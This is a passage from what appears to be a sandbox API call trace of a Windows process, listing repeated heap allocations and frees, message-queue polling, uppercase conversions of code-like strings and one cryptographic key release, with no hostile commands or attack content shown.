Flags=0x0, Size=0x10) returned 0x24a9678 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.490] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.490] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.490] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.490] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.490] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.490] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.490] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.491] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.491] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.491] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.491] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.491] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.491] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.495] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.495] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0256.495] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.495] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0256.495] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.496] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.496] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.496] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.496] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.496] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.497] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.497] CryptDestroyKey (hKey=0xaa5820) returned 1 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.499] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.500] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.500] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.501] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.501] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.501] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.502] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.502] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.502] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.502] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.502] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.502] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0256.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) 